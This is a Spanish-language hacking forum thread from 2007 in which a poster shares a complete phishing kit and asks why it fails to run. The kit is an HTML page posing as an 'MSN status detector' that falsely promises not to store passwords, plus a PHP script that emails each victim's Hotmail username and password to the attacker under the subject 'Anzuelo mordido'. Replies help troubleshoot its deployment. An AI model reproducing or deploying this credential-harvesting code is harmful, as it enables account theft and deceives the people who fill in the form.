Resultados 1 al 6 de 6

Tema: Ejecutar scripts .PHP

  1. #1 Ejecutar scripts .PHP 
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    Buenas!
    Tengo una duda... vereis estoy intentando probar el script de la vulnerabilidad de msn (aquel que metio school) solo que lo encontre por otra pag.
    El caso es que lo subo a un servidor ftp y la pagina inicial si que me sale (el index.html) pero cuando relleno el formulario con unos datos inventados (ya he dicho que es solo para hacer pruebas) y le doy a "Analizar" en vez de ejecutar el script php y mostrarme el mensaje de error que me deberia mostrar, me muestra el codigo del script en una nueva pestaña. Alguien sabria decirme porque es??

    Os dejo el codigo del script para que lo veais y me digais que puede estar mal:

    <?php

    $usuario = $_POST['usuario'];
    $password = $_POST['password'];

    $header = "From: . $usuario@hotmail.com . \r\n";
    $header .= "Mime-Version: 1.0 \r\n";
    $header .= "Content-Type: text/plain";

    $mensaje = "Datos obtenidos sobre la direccion $usuario@hotmail.com , la contrasena es: $password . \r\n";
    $mensaje .= "El e-mail es: $usuario@hotmail.com \r\n";
    $mensaje .= "Enviado el date('d/m/Y'), time())";

    $para = "TU_ CUENTA_ DE_CORREO @hotmail.com";
    $asunto = "Anzuelo mordido";

    if (mail($para, $asunto, $mensaje, $header)) {
    echo "Instalación Satisfactoria";
    }
    else {
    echo "Ocurrió un error, porfavor ingrese denuevo sus datos";
    }
    ?>

    Un saludo y gracias

    PD: Si quereis tambien el index.html (porque creo que es diferente al que colgo school) pedidmelo
    Última edición por RaidMan; 03-06-2007 a las 20:12
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    Puede ser porque el server no tenga php. O bueno, fijandome bien, el fichero se llama index.html y deberia ser index.php, ya que para que el servidor reconozca e interprete el codigo en php, debe tener esta extension. Prueba cambiandolo y ya me comentas. Un saludo!
    http://www.project-longinus.es
    Citar  
     

  3. #3  
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    El codigo que os he puesto es el send.php, que es el scritp que se ejecuta y roba las cookies para mandalas al e-mail que tu le des.
    Otra cosa es el index.html, pero ese si que funciona. Lo que no tira es el scritp .php

    Gracias y un saludo

    PD: Este es el index.html (por si lo quereis echar un ojo)

    <html>
    <head>
    <title>Te omitieron???? Averigualo aquí</title>
    <style type="text/css">
    <!--
    body,td,th {
    font-family: Arial, Helvetica, sans-serif;
    color: #FFFFFF;
    }
    body {
    background-color: #000000;
    }
    .Estilo1 {color: #FF0000}
    -->
    </style><form method="post" action="send.php">
    <bg color="black">
    <meta name="Microsoft Theme" content="zero 011, default">
    </head>
    <h1 align=center class="Estilo1"><!--mstheme--><font color="#CCCCCC"><b><font size="4" color="#FFFF00">Detector de estado de MSN Messenger</font></b><!--mstheme--></font></h1>
    <font color="FFFF00">
    <p>
    <td width="1"><!--mstheme--><font face="Arial, Arial, Helvetica"><center><img src="http://images.sydeks.net/uploads/bae8c719df.bmp" border="0" alt="QUIENTEADMITE" /></a><!--mstheme--></center></font></td>
    &nbsp;<!--mstheme--></font><table width="316" align="center" >
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica">Tu cuenta de MSN:<!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica"><input name="usuario" type="text" id="nombre" maxlength="40" size="26" value="@hotmail.com"><!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="1"><!--mstheme--><font face="Arial, Arial, Helvetica"><img src="http://images.sydeks.net/uploads/0f26eff37f.bmp" border="0" alt="Código de seguridad" /></a><!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica"><input name="telefono" type="text" id="telefono" size="6" maxlength="10" tabindex="50"></font><font size="1" color="#FFFFFF"> Introdusca el código<font color="FFFF00"><!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica">Contraseña:<!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica"><input name="password" type="password" id="mail" maxlength="26" size="20"><!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica"><!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica"></font><font size="1" color="#FFFFFF">(NO almacenamos su contraseña)</font><!--mstheme--></font></td>
    <font color="FFFF00">
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica"><div align="right">
    <input type="submit" name="Submit" value="ANALIZAR">
    </div><!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica"><input type="reset" name="Submit2" value="Borrar"><!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td colspan="2" width="296"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    </font>
    <tr>
    <td colspan="2" width="296"><!--mstheme--><font face="Arial, Arial, Helvetica"><font size="1" color="#FFFF00"><center>Al Analizar usted acepta los <a href="http://www.quienteadmite.com/terminos-condiciones.php">Términos y Condiciones</a>
    <br>
    <br>
    <br>
    Digite sus datos de usuario de MSN y le diremos todo lo que desea saber sobre su lista de contactos.
    <br>
    En la lista verá todos los contactos que lo hayan eliminado o bloqueado.
    <br>
    Observe ahora de forma segura que "amigos" lo han eliminado!!
    </font><font color="FFFF00"><marquee></marquee></center>
    </font><font color="FFFF00"><marquee></marquee>
    </font>
    <!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    <tr>
    <td width="99"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="191"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    <td width="6"><!--mstheme--><font face="Arial, Arial, Helvetica">&nbsp;<!--mstheme--></font></td>
    </tr>
    </table><!--mstheme--><font face="Arial, Arial, Helvetica">
    <p>
    &nbsp;
    </html>
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Aug 2006
    Mensajes
    273
    Descargas
    0
    Uploads
    0
    No tengo mucha idea de php, estoy empezando con el, pero puede ser que sea en vez de Content-Type: text/plain tengas que poner text/html?
    Citar  
     

  5. #5  
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    nada... lo he probado tambien y sigue sin ir...
    El caso es que cuando subo el send.php y miro el codigo fuente de la pagina me sale envuelto con etiquetas HTML
    <pre>......</pre>

    esas son las etiquetas que me salen (con el script en medio) es posible que no me deje subir php. asi que probare en otro servidor gratuito.

    Gracias por las respuestas
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  6. #6  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Efectivamente eso ocurre porque el servidor no ejecuta el php. A simple vista todo parece correcto, sólo que el servidor no parece tener esa capacidad. Prueba en un servidor local sin conexión a internet y con correo local.

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

Temas similares

  1. Shell scripts en linux
    Por bitboy en el foro GENERAL
    Respuestas: 0
    Último mensaje: 18-12-2010, 14:29
  2. Scripts
    Por Eureka en el foro WINDOWS
    Respuestas: 6
    Último mensaje: 11-10-2010, 22:27
  3. scripts en HTML
    Por minsthor en el foro PROGRAMACION WEB
    Respuestas: 2
    Último mensaje: 03-03-2006, 23:07
  4. Scripts
    Por Io_ en el foro GENERAL
    Respuestas: 2
    Último mensaje: 05-02-2004, 16:28
  5. scripts en shell
    Por defcondos en el foro GENERAL
    Respuestas: 3
    Último mensaje: 28-05-2002, 23:23

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •